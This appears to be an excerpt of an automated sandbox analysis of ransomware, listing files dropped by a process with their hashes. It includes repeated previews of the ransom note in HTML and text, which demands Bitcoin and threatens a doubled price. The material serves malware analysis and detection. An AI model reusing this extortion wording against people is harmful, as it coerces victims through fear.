                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\help_recover_instructions+fnc.html
